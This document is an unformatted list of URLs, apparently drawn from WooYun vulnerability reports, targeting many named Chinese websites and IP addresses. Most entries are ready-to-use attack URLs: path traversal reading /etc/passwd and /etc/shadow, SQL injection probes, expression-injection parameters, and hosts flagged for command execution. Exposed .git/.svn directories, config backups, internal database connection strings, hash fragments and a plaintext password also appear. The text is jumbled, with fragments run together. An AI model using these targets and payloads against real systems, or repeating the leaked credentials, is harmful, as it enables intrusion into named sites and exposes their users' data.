http://wooyun.org/bugs/wooyun-2015-0100934 www.topxon.com来测试, www.topxon.com/member http://183.62.45.173:8080/ncsd-zxkr/ http://www.kcjc.net/uc_server/data/config.inc.php.bak http://121.22.98.212:8080/gs/jumpProgram2.action?ipAddr=121.22.98.212:8080存在命令执行漏洞 http://58.253.210.156/ http://www.citsgd.com.cn/guid_sight.aspx?id=497 https://www-401.aig.com.tw/ns/Activitie http://www.0769pf.com/PopUpWindows.aspx?id=1 http://www.0769pf.com/PopUpWindows.aspx?id=1 http://www.020jiaocai.com/PopUpWindows.aspx?id=1 http://www.020jiaocai.com/PopUpWindows.aspx?id=1 http://www.elcb-rcbo.com/PopUpWindows.aspx?id=1 http://www.elcb-rcbo.com/PopUpWindows.aspx?id=1 http://www.elcb-rcbo.com/PopUpWindows.aspx?id=1 http://www.digitblue.com/PopUpWindows.aspx?id=1 http://www.fujian17.com//PopUpWindows.aspx?id=1 http://demo.dreamershop.com/PopUpWindows.aspx?id=1 https://wmtrade.pscnet.com.tw/wm/activity/show_activity.php?flag=B&mun=216 https://github.com/yinzhuancheng/WoGame http://s.qq.com http://www.jilinjobs.cn:800/EDJLPortalWeb/index.aspx http://my.veryeast.cn/user/setting/SetEmail http://lizhendev.gamepay.hupu.com/.svn/entries https://github.com/shangES/ses/blob/a0bf0b736b95cdb00f091ffd7d970231dc0ab691/WebContent/WEB-INF/classes/application.properties https://mail.wasu.com/ http://202.108.173.222:7001/console/login/LoginForm.jsp http://124.128.254.152/MSP/ http://ge.3geye.mobi/MSP/ http://iqqy.gdbnet.cn/MSP http://125.88.128.117/MSP/ http://iqqy.gdbnet.cn/MSP/ http://116.229.239.68/MSP/ http://116.229.239.72/MSP/ http://wap.edatahome.com/ http://116.229.239.83/ http://116.229.239.84/ http://116.229.239.85/ http://222.221.18.201 http://open.baojia.com/account/showimage.do?pic_addr=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd http://open.baojia.com/account/showimage.do?pic_addr=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fshadow http://218.108.255.183/UserLogin/Login.aspx http://218.108.255.183 http://fax.wasuitv.com/default.aspx http://bbs.tgbus.com/ http://uc.tgbus.com/robots.txt%00a.php http://www.metadata.com.cn/ http://211.67.126.11:8088/poweb/Catalogeaction.do?method=adminEdit&TptID=10 http://218.58.59.71:7272/poweb/Catalogeaction.do?method=adminEdit&TptID=10 http://202.206.242.26:88/poweb/Catalogeaction.do?method=adminEdit&TptID=10 http://210.35.35.73:8080/poweb/Catalogeaction.do?method=adminEdit&TptID=10 http://60.214.233.173:8080/poweb/Catalogeaction.do?method=adminEdit&TptID=10 http://210.44.1.2:8080/poweb/Catalogeaction.do?method=adminEdit&TptID=10 http://218.192.55.9/poweb/Catalogeaction.do?method=adminEdit&TptID=10 http://202.121.81.135//Catalogeaction.do?method=adminEdit&TptID=10 http://219.246.100.13:8881/poweb/Catalogeaction.do?method=adminEdit&TptID=10 http://211.67.126.11:8088/poweb/manage.do?method=edit&AccID=1 http://218.58.59.71:7272/poweb/manage.do?method=edit&AccID=1 http://202.206.242.26:88/poweb/manage.do?method=edit&AccID=1 http://210.35.35.73:8080/poweb/manage.do?method=edit&AccID=1 http://60.214.233.173:8080/poweb/manage.do?method=edit&AccID=1 http://210.44.1.2:8080/poweb/manage.do?method=edit&AccID=1 http://218.192.55.9/poweb/manage.do?method=edit&AccID=1 http://202.121.81.135//manage.do?method=edit&AccID=1 http://219.246.100.13:8881/poweb/manage.do?method=edit&AccID=1 http://211.67.126.11:8088/poweb/Affiche.do?method=affiche_Edit&AID=36 http://218.58.59.71:7272/poweb/Affiche.do?method=affiche_Edit&AID=1 http://202.206.242.26:88/poweb/Affiche.do?method=affiche_Edit&AID=1 http://210.35.35.73:8080/poweb/Affiche.do?method=affiche_Edit&AID=1 http://60.214.233.173:8080/poweb/Affiche.do?method=affiche_Edit&AID=1 http://210.44.1.2:8080/poweb/Affiche.do?method=affiche_Edit&AID=1 http://218.192.55.9/poweb/Affiche.do?method=affiche_Edit&AID=1 http://202.121.81.135//Affiche.do?method=affiche_Edit&AID=1 http://219.246.100.13:8881/poweb/Affiche.do?method=affiche_Edit&AID=1 http://ady.oa5.meetok.com/Mall/GoodSearchList.aspx?CuPage=1&Search=%27 http://www.h-h.com.cn/visa/visa_list.aspx?s=&type=%E5%95%86%E5%8A%A1%E7%AD%BE%E8%AF%81&key=12 http://www.h-h.com.cn/Hotel/SearchList.aspx?CityCode=SHA&CheckInDate=2015-06-24&CheckOutDate=2015-06-29&HotelName=1&CityName=%E4%B8%8A%E6%B5%B7&LandMarkName=12&Rank=&MinPrice=&MaxPrice= http://www.h-h.com.cn/view_news.aspx?id=20 http://www.h-h.com.cn/Json_db/flight_search.aspx?stype=&ptype=&ddw=1&sdate=2015-3-17&edate=2015-3-17&fs=&keyword=&_search=false&nd=1426585534292&rows=18&page=1&sidx=id&sord=desc www.meetok.com http://f.72dns.com/Login.aspx inurl:qsksyy http://www.lcwscgs.com/qsksyy/ http://123.130.246.26:9080/qsksyy/ http://60.211.179.22:9080/qsksyy/ http://www.wfcgs.com:9080/qsksyy/ http://cgs.ytjj.gov.cn:9061/qsksyy/ http://www.dygajj.gov.cn:9080/qsksyy/ http://58.59.39.43:9080/qsksyy/ http://218.59.228.162/ http://221.2.145.164:9080 http://www.bzwscgs.com:9080 http://mail.cdgjj.gov.cn/extmail/cgi/index.cgi http://www.mafengwo.cn/note/create.php/modify/?id=69100555,新版游记中,如图所示: http://www.gfortune.com.tw/gf_news/view_g_news.asp http://mazda.vcyber.com/ http://www.tv.cn/.git/config http://www.tomcat360.com/.git/ http://www.tomcat360.com/wp-content/themes/xm2015/tz.php http://95508.com/C1ztq4MjO0 http://www.wolive.com.cn/login.html http://www.wolive.com.cn/service/UserLogin.jsp?UserName=123&UserPass=123 http://www.epicc.com.cn/ecenter/insuringAndClaims/insurAndClaimsforIndex/policyClaim/queryEyoungByNo?policyno=PECD201342010000000005-000001 http://www.epicc.com.cn/ecenter/insuringAndClaims/insurAndClaimsforIndex/policyClaim/queryEyoungByNo?policyno=PECD201342010000000740-000001 http://www.epicc.com.cn/ecenter/insuringAndClaims/insurAndClaimsforIndex/policyClaim/queryEyoungByNo?policyno=PECD201342010000000740-009500 http://61.49.38.13:8888/noticeDetail.action?itemId=8a2530114843ba4d01497a73262a009c存在命令执行漏洞 XkksOR2snEkzmCDEMzrnX1:16196:0:99999:7 J486jemGhP9tU1Cpk6MwV1:16263:30:90:7 sZJRRV10:16399:30:90:7 encap:Ethernet addr:10.165.176.73 Bcast:10.165.176.255 Mask:255.255.255.0 fe5a:3f18/64 Scope:Link MTU:1500 packets:62421969 packets:395437 txqueuelen:1000 http://**.**.**/ http://www.kedoulvxing.com/gtick/groupTickAction!getGTickDetail.action?policyNO=ZC1504070003 http://www.kedoulvxing.com/gtick/groupTickAction!getGTickDetail.action?policyNO=ZC1504070001 http://www.kedoulvxing.com/gtick/groupTickAction!getGTickDetail.action?policyNO=ZC1504070002 http://www.kedoulvxing.com/gtick/groupTickAction!getGTickDetail.action?policyNO=ZC1504070003 http://www.kedoulvxing.com/gtick/groupTickAction!getGTickDetail.action?policyNO=ZC1504070004 http://www.kedoulvxing.com/gtick/groupTickAction!getGTickDetail.action?policyNO=ZC1505050002 http://www.kedoulvxing.com/gtick/groupTickAction!getGTickDetail.action?policyNO=ZC1505050003 http://219.148.198.26:8080/tellin/opr/basecall/login.do?CLS=USR&UITRANSFER=servicekey:274 http://219.148.198.26:8080 http://tb.81890.gov.cn/EnterpriseWeb/Enterprise/Enterprise.aspx?ID=47220 http://a.opda.com/ http://wutongyu.info/host.php http://www.gxpiao.com/xianlusearch.html?city=%e8%b4%ba%e5%b7%9e%e5%b8%82 http://www.gxpiao.com/Movie_page1.aspx?dyyid=DYYLB141029-0001 http://121.42.24.155:8888/zww/crj/content.jsp?artid=103 http://121.42.24.155:8888/zww/crj/list.jsp?classid=001001存在注入,参数classid http://121.42.24.155:8888/zww/crj/search.jsp?keys=1234 http://im.gjzq.cn:9090/webcall_chat/leaveMessage.jsp http://im.gjzq.cn:9090/webcall_chat/leaveMessage.jsp http://im.gjzq.cn:9090/webcall_chat/leaveMessage.jsp http://v.diditaxi.com.cn/point?cityId=210100&scope=city&date=0&dimension=distribute&num=300 http://beian.xrnet.cn/beian.tar.gz http://article.zol.com.cn/admin/survey/vote_preview.php?voteid=1963 http://www.soso.com/websnapshot??ie=utf8&url=http%3A%2F%2Fqq.mb5u.com%2Fabout.html&did=65b505059bf9e58d-1152efedfc5effe9-134fa5d0b31d02dc09750e547cb02b87&k=e99b271f73c314d46de1735302e8b5fa&encodedQuery=&query=qq.mb5u.com%2Fabout.html&&pid=sogou-wsse-7535bbb91c8fde34&duppid=1&rfrom=soso&w=01020400&m=0&st=0&uid=11090&ref=&furl=http%3A%2F%2Fwww.wangdaixitong.com%2Findex.html&title=%E9%87%91%E9%92%B1%E6%9F%9C%E7%BD%91%E8%B4%B7%E7%B3%BB%E7%BB%9F-P2P%E7%BD%91%E8%B4%B7%E7%B3%BB%E7%BB%9F_%E7%BD%91%E8%B4%B7%E5%B9%B3%E5%8F%B0%E5%BC%80%E5%8F%91_%E8%82%A1%E7%A5%A8%E9%85%8D%E8%B5%84%E7%B3%BB%E7%BB%9F_%E8%82%A1%E6%9D%83%E4%BC%97%E7%AD%B9%E7%B3%BB%E7%BB%9F%2C%E6%9C%80%E6%9D%83%E5%A8%81%E3%80%81%E6%9C%80%E4%B8%93%E4%B8%9A%E7%9A%84P2P%E7%BD%91%E8%B4%B7%E6%BA%90%E7%A0%81 http://qq.mb5u.com/about.html http://www.jlsgs.gov.cn/jlsxx/zxts.asp?user=7 http://www.jlsgs.gov.cn/image/pentest.asp http://db.auto.sohu.com/seckill/admin/config_c.shtml http://db.auto.sohu.com/seckill/admin/addc.shtml http://www.gdupc.com.cn/ http://111.205.44.42/license!getExpireDateOfDays.action http://a-test.bdqn.cn https://mall.gree.com/mall/GLOrderDetailsCmd?catalogId=10001&langId=-7&orderId=2628100&storeId=10652&type=PC https://mall.gree.com/mall/GLOrderDetailsCmd?catalogId=10001&langId=-7&orderId=2627081&storeId=10652&type=PC https://mall.gree.com/mall/GLOrderDetailsCmd?catalogId=10001&langId=-7&orderId=2627054&storeId=10652&type=PC https://mall.gree.com/mall/GLOrderDetailsCmd?catalogId=10001&langId=-7&orderId=2626018&storeId=10652&type=PC https://mall.gree.com/mall/FindAddressCmd?catalogId=10001&id=1360256&langId=-7&storeId=10652 https://mall.gree.com/mall/FindAddressCmd?catalogId=10001&id=1360154&langId=-7&storeId=10652 https://mall.gree.com/mall/FindAddressCmd?catalogId=10001&id=1360160&langId=-7&storeId=10652 http://www.iqm.cn/.svn/entries http://**.**.**.**/workplate/base/user/multisel.aspx http://**.**.**.**:8001/workplate//base/user/multisel.aspx http://**.**.**.**/workplate//base/user/multisel.aspx http://**.**.**.**/workplate//base/user/multisel.aspx http://**.**.**.**/workplate//base/user/multisel.aspx inurl:http://vdisk.weibo.com/?access_code= http://vdisk.weibo.com/lc/nOiuvghIXwiDBQh3g?access_code=XJ35 http://vdisk.weibo.com/lc/nOiuvghIXwiDBQh3g http://vdisk.weibo.com/lc/nOiuvghIXwiDBQh3g http://vdisk.weibo.com/lc/i4jUfWOlJGfrqcDey http://vdisk.weibo.com/lc/1xR3PoswO2NGdlJgW5v http://vdisk.weibo.com/lc/TJpjvoNIdvcGkMjGC http://vdisk.weibo.com/lc/gwtj5zm4b3PPMkNz http://vdisk.weibo.com/lc/jxpRXXPJtQSmb53yK http://vdisk.weibo.com/lc/f7C4p3ropAAE9uYe8 http://140.207.229.58:9090/ http://ap.189store.com/RegisterInfo/FindPassWordForEmail?UID=1 http://ap.189store.com/RegisterInfo/GetPassWord?UID=1 http://ap.189store.com/RegisterInfo/GetPassWord?UID=1&sendid=f0a9c426-f380-4a67-b234-2fea2010948b http://disk.bestcloud.cn/ http://disk.bestcloud.cn/demo/ http://disk.bestcloud.cn/demo/index.php/adminControlPanel/device/type/index/self/56 http://www.iqianjin.com/ http://www.jctrans.com/Reg/MailActivation.aspx?UserName= http://www.jctrans.com/Reg/MailActivation.aspx?UserName=admin http://www.jctrans.com/Reg/RActivation.aspx?userid=7E119612-C9C7-4186-A120-BEDFB0FB9FA8 http://www.jctrans.com/Reg/RActivation.aspx?userid=7E119612-C9C7-4186-A120-BEDFB0FB9FA8 http://www.jctrans.com/editpassword.aspx http://www.jctrans.com/Reg/MailActivation.aspx?UserName=haha http://www.jctrans.com/Reg/RActivation.aspx?userid=C4A52CFF-8366-4C0A-95F0-04570DF97C2C http://www.jctrans.com/Login.aspx http://club.jctrans.com/space.php?uid=731124 http://www.jctrans.com/Reg/MailActivation.aspx?UserName=jctransbbs http://www.jctrans.com/EditPassWordSecond.aspx?userid=0922717F-F0FB-4E86-ACD5-2DCB84CFD906 http://club.jctrans.com/admincp.php?action=members&username=jctransbbs&searchsubmit=yes&frames=yes http://www.ztesoft.com:808/zsmart/index.php http://www.ztesoft.com:808/static/index.php?module=CoreHome http://www.ztesoft.com:808/poll/admin/admin.php http://shanpin.m1905.com/ http://shanpin.m1905.com/download?dir=downloadFile&fileName=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd http://portal.weixinprint.com/equipment/client/queryList?menu_parent=1&menu_parent_name= http://portal.weixinprint.com/equipment/client/inputClient?select=&clientId=89 http://portal.weixinprint.com/equipment/visns/publicDetail?publicId=76904&select= http://www.uxin.com/update/show/os/android/Id/274.html http://www.uxin.com/news/index/type/1.html http://www.uxin.com/news/info/id/1277.html http://180.168.135.178:8088/remote/yhaction!list.action?yhname=360 http://180.168.135.178:8088/remote/yhaction!list.action?yhname=hzwk http://180.168.135.178:8088/remote/yhaction!list.action?yhname=CIB http://180.168.135.178:8088/remote/pageno.jsp密码734303 http://124.42.19.180:8088/chouchaReg/choucha/toReg-reg.action?classId=90000存在命令执行漏洞 swK0R2uzx6x45ZaH6tcG61:13062:0:99999:7 Q7iZBCJtjz9ND4hOb3f5P0:14321:0:99999:7 tuiGHpkFGq7ymxNeYsB0:14306:0:99999:7 DeVXOrImTFMIOdpCHNptX1:15044:0:99999:7 http://219.233.250.184:8088/report/register/register!init.action存在命令执行漏洞 http://mooc.chaoxing.com/erya/error http://passport2.chaoxing.com/login5?uid=22207734enc=2b3d866926e61dae7aeb03a5010a556c http://broker.esf.sina.com.cn/login?client_citycode=sh&r=baidu#&qq-pf-to=pcqq.group http://tls.8mov.net:90/datamanage/index.php http://tls.8mov.net:90/manage/phpinfo.php http://tls.8mov.net:90/manage/ http://www.nipcip.com/ http://www.ztmbec1.com/ http://www.hnprec.com/ http://www.zzeqmjb.com/ http://www.zzmw.gov.cn/ http://www.dengfengtv.com/ http://www.kfga.gov.cn/ http://123.15.4.130:8080/ http://www.wdqsq.gov.cn/ http://www.shilongqu.gov.cn/ http://www.wuzhi.gov.cn/ http://www.xcsrd.gov.cn/ http://211.142.134.26:8866/gxj/ http://www.luanchuanly.gov.cn/ http://www.zkcz.gov.cn/ http://www.yangguangyouzhi.com/ about:blank。这使得我前面找到的bypass标签作废。 about:last javascript://协议的时候,这个域是res: about:blank,则为空,譬如你们之前修复的about:reader http://raisedreams.com/ http://qijian.raisedreams.com http://www.iliangcang.com/i/brand/intro/?is_intro=1&id=15 http://lc-master.iliangcang.com/成功登录,可以管理注册用户,有36W之多,当然有很多僵尸账号 http://74.201.81.139/WEB-INF/proxool.xml http://74.201.81.139/WEB-INF/web.xml http://cas.us.changyou.com/ http://www.cscec3b.com.cn/ http://61.183.130.134:8888/loginindex.action http://61.237.231.101:8080 http://61.157.144.46:8080/查询地址 http://jobs.ele.me/login http://exam.heuet.edu.cn:80/jiaowu/panduan.asp http://218.108.129.135:8080/demo_main.do http://bx.fesco.com.cn/Front/default.aspx http://trade.ctrip.com/Flight/_version0805/Home/index.aspx http://fenxiao.lvmama.com/home/index.jsp驴妈妈分销平台 Url:http://a.g.gomesell.com/login/login.action http://a.g.gomesell.com/test.txt http://a.g.gomesell.com/wooyun.jsp jdbc:mysql://10.58.222.30:43306/biz?useUnicode=true&characterEncoding=UTF-8&zeroDateTimeBehavior=convertToNull jdbc:mysql://10.58.222.30:43306/b2c?useUnicode=true&characterEncoding=UTF-8&zeroDateTimeBehavior=convertToNull jdbc:mysql://10.58.222.34:43306/kubaopen?useUnicode=true&characterEncoding=UTF-8&zeroDateTimeBehavior=convertToNull jdbc:mysql://10.58.222.32:43306/kubauser?useUnicode=true&characterEncoding=UTF-8&zeroDateTimeBehavior=convertToNull jdbc:mysql://10.58.222.48:43306/biz?useUnicode=true&characterEncoding=UTF-8&zeroDateTimeBehavior=convertToNull jdbc:mysql://10.58.222.48:43306/b2c?useUnicode=true&characterEncoding=UTF-8&zeroDateTimeBehavior=convertToNull jdbc:mysql://10.58.222.48:43306/kubaopen?useUnicode=true&characterEncoding=UTF-8&zeroDateTimeBehavior=convertToNull jdbc:mysql://10.58.222.48:43306/kubauser?useUnicode=true&characterEncoding=UTF-8&zeroDateTimeBehavior=convertToNull http://www.uqee.com/Jobs/info/index/info_id/1 http://bbs.uqee.com http://bbs.uqee.com/convert/ http://bbs.uqee.com/convert/data/config.inc.php http://www.nhcc-cn.com//csccmise/yhgl.asp http://60.190.16.166//csccmise/yhgl.asp http://61.175.235.81:88//csccmise/yhgl.asp http://nbrywl.com//csccmise/yhgl.asp http://122.227.235.122//csccmise/yhgl.asp http://www.cclcfs.com:81//csccmise/yhgl.asp http://www.bluedragon.com.cn//csccmise/yhgl.asp http://www.caacts.org.cn/complaint/admin/check.action存在命令执行漏洞 http://mooc.edusoho.com/web.tar.gz http://bbs.taian.com/uc_server/install/ http://news.auto.sina.com.cn/api/news_data.php?length=10&callback=jQuery183014905301271937788_1434975864081&subid=0&dir1=103&page=1&_=1434975878254 http://star.cms.qingting.fm http://60.191.185.102:8081/fgzd.action存在命令执行漏洞 http://hi.mop.com/user/profile/save-basic http://www.0513zc.com/AppRegCmd?appId=126471 http://www.0513zc.com/AppRegCmd?appId=126473 http://www.0513zc.com/AppRegCmd?appId=126474 http://reg.163.com/getpasswd/RetakePassword.jsp http://www.hbagri.gov.cn/tabid/548/Default.aspx http://1.202.195.213/prjsun/ http://1.202.195.213/prjsun/AttachMail/5730f168-43b8-46f0-84c7-317a538752c0201506230944386860.asp http://1.202.195.213/z.txt http://read.html5.qq.com/image?imageUrl=某短链接网址 http://42.120.11.238:8888/x/ http://read.html5.qq.com/image?imageUrl= http://comment5.qq.com/comment_user2.htm?uin=1&uid=11090&ref=&furl= http://115.239.134.126/lhzxExProdProduct.do?action=showsearchaplist&flag=zjWeb http://www.hnedu.cn/.svn/entries m.haodf.com/touch/wxnewsignin/flowdetail?wxPatientReportId=2711861022 http://www.ahchld.gov.cn/ http://www.ahchld.gov.cn/macp/Login.asp http://www.ahchld.gov.cn/UpFiles/Article/2015/6/21/2015062154585345.asp www.2345.com http://www.transdata.cn/ http://218.247.138.157:8081/lky/reportManager_toTableDesign.action?codeCataLogView.resCataLogDir=存在命令执行漏洞 http://www.fotoplace.cc:8082/ http://www.fotoplace.cc:8161/ http://zhenduan.baidu.com/doc/index?md=diagnose_api&app=../../../../../../../../../../../../../../etc/passwd%00 http://ucenter.9game.com/nineday/index.html http://rd2.zhaopin.com/consume/rewardview http://**.**.**/xzxkxjExt/syssp/gs/gs_rehpsl_pub.actiondataid= http://www.zjda.com/default/member/memberPersonal!print.shtml?id=203108 http://www.zjda.com/default/member/memberPersonal!print.shtml?id=203109 http://www.zjda.com/default/member/memberPersonal!print.shtml?id=203110 http://www.zjda.com/default/member/memberPersonal!print.shtml?id=203111 http://61.158.214.4/epg/template/template1/zt/64/view_genre_ss.ecgi?genre_selectlist=++director+like+BINARY+%7C%25%B9%B2%C7%E0%CD%C5%D6%D0%D1%EB%25%7C+or++director+like+BINARY+%7C%25%D7%A8%CC%E2%BD%DA%C4%BF%25%7C+&menu_id=&menuid_zy=vcom_2&pinyin=h&clid=&clname=&busiid=&layoutid=&privateid=&appmenutype=&curappmenutype=&channelcode=&chargetype=&turn=1 http://61.158.218.17/epg/template/template1/zt/64/view_genre_ss.ecgi?genre_selectlist=++director+like+BINARY+%7C%25%B9%B2%C7%E0%CD%C5%D6%D0%D1%EB%25%7C+or++director+like+BINARY+%7C%25%D7%A8%CC%E2%BD%DA%C4%BF%25%7C+&menu_id=&menuid_zy=vcom_2&pinyin=h&clid=&clname=&busiid=&layoutid=&privateid=&appmenutype=&curappmenutype=&channelcode=&chargetype=&turn=1 http://61.158.215.201/epg/template/template1/zt/64/view_genre_ss.ecgi?genre_selectlist=++director+like+BINARY+%7C%25%B9%B2%C7%E0%CD%C5%D6%D0%D1%EB%25%7C+or++director+like+BINARY+%7C%25%D7%A8%CC%E2%BD%DA%C4%BF%25%7C+&menu_id=&menuid_zy=vcom_2&pinyin=h&clid=&clname=&busiid=&layoutid=&privateid=&appmenutype=&curappmenutype=&channelcode=&chargetype=&turn=1 http://61.158.215.145/epg/template/template1/zt/64/view_genre_ss.ecgi?genre_selectlist=++director+like+BINARY+%7C%25%B9%B2%C7%E0%CD%C5%D6%D0%D1%EB%25%7C+or++director+like+BINARY+%7C%25%D7%A8%CC%E2%BD%DA%C4%BF%25%7C+&menu_id=&menuid_zy=vcom_2&pinyin=h&clid=&clname=&busiid=&layoutid=&privateid=&appmenutype=&curappmenutype=&channelcode=&chargetype=&turn=1 http://121.28.7.232/epg/template/template1/zt/64/view_genre_ss.ecgi?genre_selectlist=++director+like+BINARY+%7C%25%B9%B2%C7%E0%CD%C5%D6%D0%D1%EB%25%7C+or++director+like+BINARY+%7C%25%D7%A8%CC%E2%BD%DA%C4%BF%25%7C+&menu_id=&menuid_zy=vcom_2&pinyin=h&clid=&clname=&busiid=&layoutid=&privateid=&appmenutype=&curappmenutype=&channelcode=&chargetype=&turn=1 http://eladies.sina.com.hk/cgi-bin/faq/astrology.cgi?action=view&id=464 http://web.7k7k.com http://kefu.linekong.com http://kefu.linekong.com/eService/system/inputLogin.do?gameId=${99337-10246}&gameMainId=4 http://kefu.linekong.com/eService/system/inputLogin.do?gameId=${application}&gameMainId=4 http://kefu.linekong.com/eService/system/inputLogin.do?gameId=10&gameMainId=${100167-11126 http://kefu.linekong.com/eService/system/inputLogin.do?gameId=10&gameMainId=4${application http://kefu.linekong.com/eService/struts/webconsole.html http://kefu.linekong.com/eService/css/ http://kefu.linekong.com/eService/download/ http://kefu.linekong.com/eService/images/ http://kefu.linekong.com/eService/js/ http://www.shangxueba.com/ask/5470045.html http://221.174.24.96:6088/Latex/latex.action?latex=WT1cbGVmdFx7XGJlZ2lue2FycmF5fXtjY31BJyAm5b2TR18x44CBR18y5ZCM5Li65L2O55S15bmz%0D%0A5pe2IFxc6auY6Zi7ICYg5b2TR18x44CBR18y5Lit5pyJ5LiA5Liq5Li66auY55S15bmz5pe2XGVu%0D%0AZHthcnJheX0%3D http://114.80.79.146:8000/ http://cos.vcyber.com/callcenter/ http://weixin.bluedon.com/bluedon_wx/ www.imooc.com/api2/userloginbyemail http://weirenwu.weibo.com http://210.74.129.34:8000/epro/ebid/viewInvite1.asp?InviteId=0000002852 http://zhaobiao.cdjcc.com/epro/ebid/viewInvite1.asp?InviteId=0000002852 http://caigou.irico.com.cn/Rat/ebid/viewInvite1.asp?InviteId=0000002852 http://eps.myande.com/EPro/ebid/viewInvite1.asp?InviteId=0000002852 http://tycg.jiigoo.com/Rat/ebid/viewInvite1.asp?InviteId=0000002852 http://210.74.129.34:8000/epro/ebid/viewInvite2.asp?InviteId=0000002852 http://zhaobiao.cdjcc.com/epro/ebid/viewInvite2.asp?InviteId=0000002852 http://caigou.irico.com.cn/Rat/ebid/viewInvite2.asp?InviteId=0000002852 http://eps.myande.com/EPro/ebid/viewInvite2.asp?InviteId=0000002852 http://tycg.jiigoo.com/Rat/ebid/viewInvite2.asp?InviteId=0000002852 http://210.74.129.34:8000/epro/ebid/viewInvite3.asp?InviteId=0000002852 http://zhaobiao.cdjcc.com/epro/ebid/viewInvite3.asp?InviteId=0000002852 http://caigou.irico.com.cn/Rat/ebid/viewInvite3.asp?InviteId=0000002852 http://eps.myande.com/EPro/ebid/viewInvite3.asp?InviteId=0000002852 http://tycg.jiigoo.com/Rat/ebid/viewInvite3.asp?InviteId=0000002852 http://210.74.129.34:8000/epro/ebid/viewInvite4.asp?InviteId=0000002852 http://zhaobiao.cdjcc.com/epro/ebid/viewInvite4.asp?InviteId=0000002852 http://caigou.irico.com.cn/Rat/ebid/viewInvite4.asp?InviteId=0000002852 http://eps.myande.com/EPro/ebid/viewInvite4.asp?InviteId=0000002852 http://tycg.jiigoo.com/Rat/ebid/viewInvite4.asp?InviteId=0000002852 http://210.74.129.34:8000/epro/ebid/viewInvite5.asp?InviteId=0000002852 http://zhaobiao.cdjcc.com/epro/ebid/viewInvite5.asp?InviteId=0000002852 http://caigou.irico.com.cn/Rat/ebid/viewInvite5.asp?InviteId=0000002852 http://eps.myande.com/EPro/ebid/viewInvite5.asp?InviteId=0000002852 http://tycg.jiigoo.com/Rat/ebid/viewInvite5.asp?InviteId=0000002852 http://210.74.129.34:8000/epro/ebid/viewInvite6.asp?InviteId=0000002852 http://zhaobiao.cdjcc.com/epro/ebid/viewInvite6.asp?InviteId=0000002852 http://caigou.irico.com.cn/Rat/ebid/viewInvite6.asp?InviteId=0000002852 http://eps.myande.com/EPro/ebid/viewInvite6.asp?InviteId=0000002852 http://tycg.jiigoo.com/Rat/ebid/viewInvite6.asp?InviteId=0000002852 http://210.74.129.34:8000//epro/EBid/ViewClarify1.asp?InviteId=11 http://zhaobiao.cdjcc.com/epro/EBid/ViewClarify1.asp?InviteId=11 http://caigou.irico.com.cn/Rat/EBid/ViewClarify1.asp?InviteId=11 http://eps.myande.com/EPro/EBid/ViewClarify1.asp?InviteId=11 http://tycg.jiigoo.com/Rat/EBid/ViewClarify1.asp?InviteId=11 http://210.74.129.34:8000//epro/EBid/ViewClarify.asp?InviteId=11 http://zhaobiao.cdjcc.com/epro/EBid/ViewClarify.asp?InviteId=11 http://caigou.irico.com.cn/Rat/EBid/ViewClarify.asp?InviteId=11 http://eps.myande.com/EPro/EBid/ViewClarify.asp?InviteId=11 http://tycg.jiigoo.com/Rat/EBid/ViewClarify.asp?InviteId=11 http://210.74.129.34:8000/EPro/EBid/AuditForm/AuditForm_ExpertForm.asp?InviteId=11 http://zhaobiao.cdjcc.com/epro/EBid/AuditForm/AuditForm_ExpertForm.asp?InviteId=11 http://caigou.irico.com.cn/Rat/EBid/AuditForm/AuditForm_ExpertForm.asp?InviteId=11 http://eps.myande.com/EPro/EBid/AuditForm/AuditForm_ExpertForm.asp?InviteId=11 http://tycg.jiigoo.com/Rat/EBid/AuditForm/AuditForm_ExpertForm.asp?InviteId=11 http://210.74.129.34:8000/EPro/EBid/AuditForm/ViewAuditInfo.asp?InviteId=11 http://zhaobiao.cdjcc.com/epro/EBid/AuditForm/ViewAuditInfo.asp?InviteId=11 http://caigou.irico.com.cn/Rat/EBid/AuditForm/ViewAuditInfo.asp?InviteId=11 http://eps.myande.com/EPro/EBid/AuditForm/ViewAuditInfo.asp?InviteId=11 http://tycg.jiigoo.com/Rat/EBid/AuditForm/ViewAuditInfo.asp?InviteId=11 http://210.74.129.34:8000/EPro/EBid/clarify/ViewExpertAnswerList.asp?InviteId=11 http://zhaobiao.cdjcc.com/epro/EBid/clarify/ViewExpertAnswerList.asp?InviteId=11 http://caigou.irico.com.cn/Rat/EBid/clarify/ViewExpertAnswerList.asp?InviteId=11 http://eps.myande.com/EPro/EBid/clarify/ViewExpertAnswerList.asp?InviteId=11 http://tycg.jiigoo.com/Rat/EBid/clarify/ViewExpertAnswerList.asp?InviteId=11 http://210.74.129.34:8000/EPro/EBid/clarify/ViewContent.asp?InviteId=11 http://zhaobiao.cdjcc.com/epro/EBid/clarify/ViewContent.asp?InviteId=11 http://caigou.irico.com.cn/Rat/EBid/clarify/ViewContent.asp?InviteId=11 http://eps.myande.com/EPro/EBid/clarify/ViewContent.asp?InviteId=11 http://tycg.jiigoo.com/Rat/EBid/clarify/ViewContent.asp?InviteId=11 http://210.74.129.34:8000/EPro/EBid/ManageBid/CompTech.asp?InviteId=11 http://zhaobiao.cdjcc.com/epro/EBid/ManageBid/CompTech.asp?InviteId=11 http://caigou.irico.com.cn/Rat/EBid/ManageBid/CompTech.asp?InviteId=11 http://eps.myande.com/EPro/EBid/ManageBid/CompTech.asp?InviteId=11 http://tycg.jiigoo.com/Rat/EBid/ManageBid/CompTech.asp?InviteId=11 http://210.74.129.34:8000/EPro/EBid/ManageBid/CompTech1.asp?InviteId=11 ttp://zhaobiao.cdjcc.com/epro/EBid/ManageBid/CompTech1.asp?InviteId=11 http://caigou.irico.com.cn/Rat/EBid/ManageBid/CompTech1.asp?InviteId=11 http://eps.myande.com/EPro/EBid/ManageBid/CompTech1.asp?InviteId=11 http://tycg.jiigoo.com/Rat/EBid/ManageBid/CompTech1.asp?InviteId=11 http://210.74.129.34:8000/EPro/EBid/ManageBid/DelayInviteTime.asp?InviteId=11 http://zhaobiao.cdjcc.com/epro/EBid/ManageBid/DelayInviteTime.asp?InviteId=11 http://caigou.irico.com.cn/Rat/EBid/ManageBid/DelayInviteTime.asp?InviteId=11 http://eps.myande.com/EPro/EBid/ManageBid/DelayInviteTime.asp?InviteId=11 http://tycg.jiigoo.com/Rat/EBid/ManageBid/DelayInviteTime.asp?InviteId=11 